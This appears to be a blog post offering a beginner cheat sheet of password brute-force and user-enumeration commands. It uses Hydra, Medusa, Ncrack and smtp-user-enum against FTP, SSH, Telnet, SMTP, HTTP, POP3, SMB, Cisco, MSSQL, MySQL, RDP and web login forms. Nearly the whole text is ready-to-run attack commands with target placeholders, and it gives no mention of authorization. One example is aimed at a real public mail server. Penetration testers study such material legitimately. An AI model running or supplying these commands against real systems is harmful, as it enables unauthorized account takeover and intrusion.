The Beginner Bruteforce Guide

Requirements:-

- Wordlist (https://github.com/danielmiessler/SecLists)
- Username(or userlist /usr/share/wordlist)
- Kali Linux or Termux (Google For Termux For Tools Installation!)
- Working Internet

FTP Bruteforce 📁

1️⃣ Hydra 🐍
$ hydra -l superuser -P pwd.txt -v -f -e ns -t 5 -w 20 <ip> ftp >> brute_ftp.out

$ hydra -t 5 -V -f -l root -P common.txt ftp://<ip> >> brute_ftp.out

$ hydra -v -f -l ftp -P fpass.lst -t 10 ftp://<ip> >> brute_ftp.out

$ hydra -l root -P 500-worst-passwords.txt <ip> ftp

For the parameters please type hydra -h !

2️⃣ Medusa 🗿
$ medusa -u test -P 500-worst-passwords.txt -h <ip> -M ftp

$ medusa -M ftp -h <ip> -u username -p password


SSH 📡

1️⃣ Medusa 🗿
$ medusa -h <target> -P /root/pasword.txt -u root -M ssh

2️⃣ NCrack 🦀
$ ncrack -p ssh -u root --pass 'root'
<target>

3️⃣ Hydra 🐍
$ hydra -t 5 -V -f -l root -P common.txt localhost ssh >> brute_ssh.out

$ hydra -v -l root -P 500-worst-passwords.txt <target> ssh >> brute_ssh.out

$ hydra -v -l root -P fpass.lst -t 5 ssh://ip -o brute_ssh.out

Telnet 📞

1️⃣ Hydra 🐍
$ hydra -v -l root -P fpass.lst -t 5 telnet://<ip> >> brute_telnet.out

$ hydra -l username -P wordlist -t 4 -s 23 -e ns -f -v <ip> telnet >> brute_telnet.out

2️⃣ Medusa 🗿
$ medusa -h <ip> -M telnet -U user.txt -P password.txt

SMTP 📧

1️⃣ Medusa 🗿
$ medusa -M smtp -m AUTH:NTLM -U accounts.txt -p password

$ medusa -M smtp -m EHLO:world -U accounts.txt -p password

SMTP VRFY 📧

1️⃣ Medusa 🗿
$ medusa -M smtp-vrfy -m VERB:VRFY -U accounts.txt -p domain.com

2️⃣ Smtp-User-Enum 🔩
$ smtp-user-enum -M VRFY -U /home/weak_wordlist/userall.txt -t <ip>

SMTP RCPT TO 📧

1️⃣ Medusa 🗿
medusa -M smtp-vrfy -m VERB:RCPT TO -U accounts.txt -p domain.com

HTTP 🔓

1️⃣ Hydra 🐍
$ hydra -m /tip/ -L Userid.txt -p 12345678 -e s -V -f <ip> http-get

HTTPS 🔐

1️⃣ Hydra 🐍
$ hydra -m /tip/ -L Userid.txt -P List.txt -e s -V -f <ip> https-get

POP3 📥

1️⃣ Medusa 🗿
$ medusa -M pop3 -m MODE:AS400 -U accounts.txt -p password

$ medusa -M pop3 -m DOMAIN:<url> -U accounts.txt -p password

2️⃣ Hydra 🐍
$ hydra -l muts -P pass.txt my.pop3.mail pop3 >> brute_pop3.out

$ hydra -S -l <youremail@domain> -P password.lst pop3.live.com -s 995 pop3 >> brute_pop3.out

SMB 📡

1️⃣ Hydra 🐍
$ hydra  -v  -l Administrator -P fpass.lst smb://<ip> >> brute_smb.out

$ hydra -L user.txt -P pass.txt -e ns -f -v -V -w5 <ip> smb >> brute_smb.out

2️⃣ Medusa 🗿
$ medusa -h <ip> -u administrator -P passwords.txt -e ns -M smbnt >> brute_smb.out

Cisco 🖲
1️⃣ Hydra 🐍
$ hydra -f -v -P pass.txt <ip> cisco >> brute_cisco.out

$ hydra -m cloud -P pass.txt <ip> cisco-enable >> brute_cisco.out

MSSQL 🧱

1️⃣ Hydra 🐍
$ hydra -v -l sa -P fpass.lst -t 4 <ip> mssql -o brute_mssql.out

$ hydra -t 5 -V -f -l sa -P "C:\pass.txt" <ip> mssql

$ hydra mssql://<ip>:1433 -l sa -P /root/Desktop/parolalar

MySQL 📅

1️⃣ Hydra 🐍
$ hydra -t 5 -V -f -l root -e ns -P common.txt localhost mysql

$ hydra -v -l root -P fpass.lst -t 1 mysql://ip -o brute_mysql.out

RDP 🔮

1️⃣ Hydra 🐍
$ hydra -v -f -l administrator -P common.txt rdp://<ip> // not good

2️⃣ Medusa 🗿
$ medusa -u administrator -P /usr/share/john/password.lst -h 10.10.10.71 -M rdp

3️⃣ NCrack 🦀
$ ncrack -p rdp -u administrator --pass 'password' -iL in2

$ ncrack -vv --user offsec -P password-file.txt rdp://<ip>

WebForm 🕸
1️⃣ Hydra 🐍
$ hydra -t 4 -l admin -V -P common.txt <ip> http-form-post "/login/log.php:user=^USER^&password=^PASS^:S=success"

$ hydra -t 4 -l admin -V -P common.txt <ip> http-form-post "/login/log.php:user=^USER^&password=^PASS^:fail"



@𝑇𝘩𝑒𝑀𝑎𝑠𝑡𝑒𝑟𝐶𝐻) ⚠️





Enjoy! Follow us for more...
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

How to configure jQuery Mobile defaults.mp4

  Download  How to configure jQuery Mobile defaults.mp4 Configuring jQuery Mobile defaults allows you to change how the framework behaves a...